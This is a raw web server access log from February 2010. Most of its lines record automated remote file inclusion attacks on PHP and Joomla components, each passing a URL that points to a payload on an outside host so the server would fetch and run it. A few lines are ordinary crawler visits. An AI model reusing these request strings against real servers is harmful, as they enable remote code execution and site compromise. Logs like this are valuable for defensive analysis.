69.175.7.90 - - [11/Feb/2010:08:01:02 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:01:24 -0800] "GET /errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [11/Feb/2010:08:01:59 -0800] "GET /errors.php?error=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:08:03:12 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:03:13 -0800] "GET /orange_g/forum/viewtopic.php?p=25759 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
58.150.99.131 - - [11/Feb/2010:08:03:36 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:08:03:53 -0800] "GET /logs/access_100128.log//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:08:04:03 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:08:04:20 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:08:04:20 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:08:04:20 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:04:24 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:04:24 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:04:24 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:04:24 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:04:24 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:04:25 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:08:04:49 -0800] "GET /logs/access_100128.log//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [11/Feb/2010:08:05:06 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:08:05:11 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [11/Feb/2010:08:05:29 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [11/Feb/2010:08:05:29 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [11/Feb/2010:08:05:29 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [11/Feb/2010:08:05:33 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:06:11 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:06:51 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:06:51 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:06:54 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:08:02 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:08:23 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:08:23 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:08:23 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.206.226.54 - - [11/Feb/2010:08:08:43 -0800] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
203.206.226.54 - - [11/Feb/2010:08:08:43 -0800] "GET /logs/access_100111.log%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
203.206.226.54 - - [11/Feb/2010:08:08:44 -0800] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:02 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:02 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:03 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:05 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:08:09:36 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:52 -0800] "GET /logs/access_100123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:52 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:09:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:07 -0800] "GET /logs/access_100123.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:08 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:09 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:09 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:21 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:21 -0800] "GET /logs/access_100123.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:42 -0800] "GET /logs/access_100123.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:10:44 -0800] "GET /logs/access_100208.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:08:10:50 -0800] "GET /logs/access_100126.log/index2.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:11:06 -0800] "GET /logs/access_100208.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.255.120 - - [11/Feb/2010:08:11:06 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
222.239.255.120 - - [11/Feb/2010:08:11:06 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/id.txt??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.puaga.com"
222.239.255.120 - - [11/Feb/2010:08:11:07 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:11:07 -0800] "GET /logs/access_100208.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:12:00 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:12:00 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:08:12:03 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.255.120 - - [11/Feb/2010:08:12:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
222.239.255.120 - - [11/Feb/2010:08:12:43 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/id.txt??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:08:13:33 -0800] "GET /logs/access_100112.log//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:08:13:33 -0800] "GET /errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:08:13:33 -0800] "GET /logs//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:13:38 -0800] "GET /logs/access_100113.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:13:38 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:13:40 -0800] "GET /logs/access_100113.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:08:14:15 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.7.30 - - [11/Feb/2010:08:14:48 -0800] "GET /orange_g/forum/viewtopic.php?p=28705 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
195.186.64.181 - - [11/Feb/2010:08:14:56 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:14:56 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [11/Feb/2010:08:14:57 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bethelphotoworks.com/css/id1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [11/Feb/2010:08:15:18 -0800] "GET /logs/access_100129.log//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.175.7.90 - - [11/Feb/2010:08:15:44 -0800] "GET /logs/access_100201.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:08:16:17 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:16:18 -0800] "GET /orange_g/forum/viewtopic.php?p=25290 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:08:16:19 -0800] "GET /orange_g/forum/viewtopic.php?p=25294 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
209.59.163.57 - - [11/Feb/2010:08:16:30 -0800] "GET /logs/access_100129.log%20//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:08:16:31 -0800] "GET /orange_g/forum/viewtopic.php?p=26223 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
200.93.147.154 - - [11/Feb/2010:08:16:51 -0800] "GET /logs/access_100128.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:17:54 -0800] "GET /logs/access_100208.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:17:54 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:17:55 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:18:11 -0800] "GET /spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:18:11 -0800] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:18:12 -0800] "GET /logs/access_100118.log%20%20//spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:18:37 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:18:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:08:18:37 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:18:42 -0800] "GET /logs/access_100109.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:18:42 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:18:42 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:44 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:44 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:44 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:44 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:18:45 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:45 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:45 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:08:18:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:08:19:06 -0800] "GET /logs/access_100125.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:08:20:24 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:08:20:24 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:08:20:24 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:08:20:28 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:08:20:28 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:20:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:20:42 -0800] "GET /appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:08:20:47 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
